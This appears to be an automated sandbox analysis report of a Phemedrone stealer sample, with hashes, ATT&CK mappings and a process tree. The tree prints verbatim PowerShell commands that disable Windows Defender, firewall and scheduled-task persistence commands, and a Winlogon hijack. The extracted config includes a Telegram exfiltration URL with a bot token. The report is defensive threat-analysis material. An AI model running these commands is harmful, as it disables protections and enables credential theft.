phemedrone | c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2

Analysis

max time kernel
117s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19-09-2024 08:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
Size

768KB
MD5

69c4993d6b9836514cacc5997e171af0
SHA1

1140c1da02be1aee978bb942e2458b625c666884
SHA256

c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2
SHA512

bbab4efad27846b3032c22fca816cf8792ab9d8944aa38185a6a867ecbbefa39b0b10cab6e357f512413fb7bd7352d5a18a19f68eb946e039c3eda9db7721419
SSDEEP

12288:/EkHbPv8rE9hHKCzt8wDvsgCB9HM1tUUEAWss9apo0:/lHUE98ct8iv2s0lHNe

Score

10^/10

phemedrone credential_access evasion execution persistence privilege_escalation spyware stealer trojan

Malware Config

Extracted

Family

phemedrone

https://api.telegram.org/bot7266067820:AAGt1Lxc4KCTQDsEE5jnHkzETADxNAfSwWU/sendDocument

Signatures

Contains code to disable Windows Defender 1 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/files/0x000b000000016cd3-42.dat	disable_win_def

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\System32\\userinit.exe,C:\\Users\\Admin\\WindowsHealth.exe"	dll.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	WScript.exe

Phemedrone
An information and wallet stealer written in C#.
stealer phemedrone
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2284	powershell.exe
1912	powershell.exe
2316	powershell.exe
2932	powershell.exe
2148	powershell.exe
2028	powershell.exe
1792	powershell.exe
1972	powershell.exe
2384	powershell.exe
2788	powershell.exe
1444	powershell.exe
2864	powershell.exe
2080	powershell.exe
1644	powershell.exe

Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Executes dropped EXE 3 IoCs

pid	Process
2112	dll.exe
2748	phem.exe
2568	WindowsHealth.exe

Loads dropped DLL 2 IoCs

pid	Process
2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
2112	dll.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\Setup.exe	dll.exe
File opened for modification	C:\Windows\Setup.exe	dll.exe
File created	C:\Windows\xdwd.dll	dll.exe
File opened for modification	C:\Windows\xdwd.dll	dll.exe
File opened for modification	C:\Windows\Setup.exe	WindowsHealth.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2508	schtasks.exe
2756	schtasks.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

pid	Process
2080	powershell.exe
1644	powershell.exe
2864	powershell.exe
2028	powershell.exe
1792	powershell.exe
2284	powershell.exe
2384	powershell.exe
1912	powershell.exe
1972	powershell.exe
2788	powershell.exe
2316	powershell.exe
2932	powershell.exe
1444	powershell.exe
2148	powershell.exe
2568	WindowsHealth.exe

Suspicious use of AdjustPrivilegeToken 18 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	1644	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2112	dll.exe
Token: SeDebugPrivilege	2748	phem.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	2932	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2148	powershell.exe
Token: SeDebugPrivilege	2568	WindowsHealth.exe
Token: SeIncBasePriorityPrivilege	2568	WindowsHealth.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2288 wrote to memory of 2080	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	28
PID 2288 wrote to memory of 2080	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	28
PID 2288 wrote to memory of 2080	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	28
PID 2288 wrote to memory of 2112	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	30
PID 2288 wrote to memory of 2112	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	30
PID 2288 wrote to memory of 2112	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	30
PID 2288 wrote to memory of 1644	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	31
PID 2288 wrote to memory of 1644	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	31
PID 2288 wrote to memory of 1644	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	31
PID 2288 wrote to memory of 2748	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	34
PID 2288 wrote to memory of 2748	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	34
PID 2288 wrote to memory of 2748	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	34
PID 2288 wrote to memory of 2864	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	35
PID 2288 wrote to memory of 2864	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	35
PID 2288 wrote to memory of 2864	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	35
PID 2288 wrote to memory of 2556	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	37
PID 2288 wrote to memory of 2556	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	37
PID 2288 wrote to memory of 2556	2288	c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe	37
PID 2556 wrote to memory of 1840	2556	WScript.exe	39
PID 2556 wrote to memory of 1840	2556	WScript.exe	39
PID 2556 wrote to memory of 1840	2556	WScript.exe	39
PID 1840 wrote to memory of 2028	1840	WScript.exe	40
PID 1840 wrote to memory of 2028	1840	WScript.exe	40
PID 1840 wrote to memory of 2028	1840	WScript.exe	40
PID 1840 wrote to memory of 2284	1840	WScript.exe	42
PID 1840 wrote to memory of 2284	1840	WScript.exe	42
PID 1840 wrote to memory of 2284	1840	WScript.exe	42
PID 1840 wrote to memory of 1792	1840	WScript.exe	43
PID 1840 wrote to memory of 1792	1840	WScript.exe	43
PID 1840 wrote to memory of 1792	1840	WScript.exe	43
PID 1840 wrote to memory of 1972	1840	WScript.exe	46
PID 1840 wrote to memory of 1972	1840	WScript.exe	46
PID 1840 wrote to memory of 1972	1840	WScript.exe	46
PID 1840 wrote to memory of 2384	1840	WScript.exe	47
PID 1840 wrote to memory of 2384	1840	WScript.exe	47
PID 1840 wrote to memory of 2384	1840	WScript.exe	47
PID 1840 wrote to memory of 1912	1840	WScript.exe	50
PID 1840 wrote to memory of 1912	1840	WScript.exe	50
PID 1840 wrote to memory of 1912	1840	WScript.exe	50
PID 1840 wrote to memory of 2788	1840	WScript.exe	51
PID 1840 wrote to memory of 2788	1840	WScript.exe	51
PID 1840 wrote to memory of 2788	1840	WScript.exe	51
PID 1840 wrote to memory of 2932	1840	WScript.exe	54
PID 1840 wrote to memory of 2932	1840	WScript.exe	54
PID 1840 wrote to memory of 2932	1840	WScript.exe	54
PID 1840 wrote to memory of 2316	1840	WScript.exe	55
PID 1840 wrote to memory of 2316	1840	WScript.exe	55
PID 1840 wrote to memory of 2316	1840	WScript.exe	55
PID 1840 wrote to memory of 2148	1840	WScript.exe	58
PID 1840 wrote to memory of 2148	1840	WScript.exe	58
PID 1840 wrote to memory of 2148	1840	WScript.exe	58
PID 1840 wrote to memory of 1444	1840	WScript.exe	59
PID 1840 wrote to memory of 1444	1840	WScript.exe	59
PID 1840 wrote to memory of 1444	1840	WScript.exe	59
PID 2112 wrote to memory of 2732	2112	dll.exe	62
PID 2112 wrote to memory of 2732	2112	dll.exe	62
PID 2112 wrote to memory of 2732	2112	dll.exe	62
PID 2112 wrote to memory of 2268	2112	dll.exe	63
PID 2112 wrote to memory of 2268	2112	dll.exe	63
PID 2112 wrote to memory of 2268	2112	dll.exe	63
PID 2268 wrote to memory of 2508	2268	cmd.exe	66
PID 2268 wrote to memory of 2508	2268	cmd.exe	66
PID 2268 wrote to memory of 2508	2268	cmd.exe	66
PID 2112 wrote to memory of 2516	2112	dll.exe	67

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe
"C:\Users\Admin\AppData\Local\Temp\c45264dce1954ccde762e75a3a7fa94a847e2c3e0cca9592983c840f877581f2N.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2288
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dll.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Users\Admin\AppData\Local\Temp\dll.exe
  "C:\Users\Admin\AppData\Local\Temp\dll.exe"
  2⤵
  - Modifies WinLogon for persistence
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2112
- - C:\Windows\system32\CMD.exe
    "CMD" netsh advfirewall firewall add rule name="I6KX"gGn"Kc.">" dir=in action=allow program="C:\Users\Admin\WindowsHealth.exe" enable=yes & exit
    3⤵
    PID:2732
- - C:\Windows\system32\cmd.exe
    "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2268
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 1 /tn "Setup.exe" /tr "C:\Users\Admin\WindowsHealth.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2508
- - C:\Windows\system32\cmd.exe
    "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST & exit
    3⤵
    PID:2516
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc minute /mo 30 /tn "Setup.exe" /tr "C:\Windows\Setup.exe" /RL HIGHEST
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:2756
- - C:\Users\Admin\WindowsHealth.exe
    "C:\Users\Admin\WindowsHealth.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\phem.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1644
- C:\Users\Admin\AppData\Local\Temp\phem.exe
  "C:\Users\Admin\AppData\Local\Temp\phem.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2748
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 2748 -s 700
    3⤵
    PID:1524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wd.vbs'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2864
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2556
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\wd.vbs" /elevate
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - Suspicious use of WriteProcessMemory
    PID:1840
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1792
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2384
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1912
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\dll.exe

Filesize
494KB

MD5
8df36558e2243aebb32c2f000f6c3004

SHA1
cdadf26e175a7c5c2f0733e922b20a3ed9e40b7c

SHA256
6416b46a1ef1c7f430578d925ba79755c44587de14fe25f13e3d907c2adab47e

SHA512
cd458956d0a2d7e84682735f815ec9ee3522b23d959870b9b12f7b780fac5a881c350b1ec7e0edd14b0b89219877c5eda7bdd5e75c613478cad3ccf3a85fb42b

Download Submit
C:\Users\Admin\AppData\Local\Temp\phem.exe

Filesize
121KB

MD5
da35d4754d59730768427d275dadfa76

SHA1
2cc27a5fa85d0c5a8faa9874d6cb45b472dd1ac8

SHA256
cbf36379349e8bfe52ce74ee151322333161142acb9f7b9434e2acaa6217755f

SHA512
c031ffdaa7624b71039810cca9cc045ddd84e570bb44ad211d6f9b5cc12676b74ce515c326cdf1323ed586e60cdb29806d603b9c9d503f31130c84551285ed0e

Download Submit
C:\Users\Admin\AppData\Local\Temp\wd.vbs

Filesize
1KB

MD5
f95be7e4eb1d1c7114c8daccb3ad6c63

SHA1
e0605fc6729fdfce938f5dfc07e2bcf11df22301

SHA256
86b3c33e6b71fe3907bc8c21b8ce311ff375d215d0a4924eba3c5f32068fe6e1

SHA512
58998140cdeb52047f2dc762598a0c13535bdfa81145ac4e394d6f7bf3ff7e0766eb375da140a8d3a784c6460b4cdd22d09bcb135ea8fa4d06733700783acc84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
385a15b28773f375b4d6721fe024de8a

SHA1
538750d8ee7505ce2e6b50a66b77fb1eadfa8fba

SHA256
cc698e39918c9f60e072ee8ebac1719790697ccb14df67640743cc69cfb0cff9

SHA512
ee1fd9e5381cddf20fede0424440fd8872ec23df09740c61b03fa732ff83b3044ed57fc85b766b99883591189b1970cac216048ea1e16837679434cc366a636f

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/1644-23-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/1644-22-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2028-50-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2080-7-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

Filesize
2.9MB

Download
memory/2080-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2080-6-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2112-16-0x000000013F910000-0x000000013F990000-memory.dmp

Filesize
512KB

Download
memory/2288-43-0x000000001B6C0000-0x000000001B6D0000-memory.dmp

Filesize
64KB

Download
memory/2288-0-0x000007FEF5CF3000-0x000007FEF5CF4000-memory.dmp

Filesize
4KB

Download
memory/2288-1-0x00000000012A0000-0x0000000001364000-memory.dmp

Filesize
784KB

Download
memory/2568-150-0x000000013F480000-0x000000013F500000-memory.dmp

Filesize
512KB

Download
memory/2568-154-0x000007FEF27E0000-0x000007FEF2802000-memory.dmp

Filesize
136KB

Download
memory/2568-152-0x000007FEF27E0000-0x000007FEF2802000-memory.dmp

Filesize
136KB

Download
memory/2748-30-0x0000000000FD0000-0x0000000000FF4000-memory.dmp

Filesize
144KB

Download
memory/2864-36-0x0000000002870000-0x0000000002878000-memory.dmp

Filesize
32KB

Download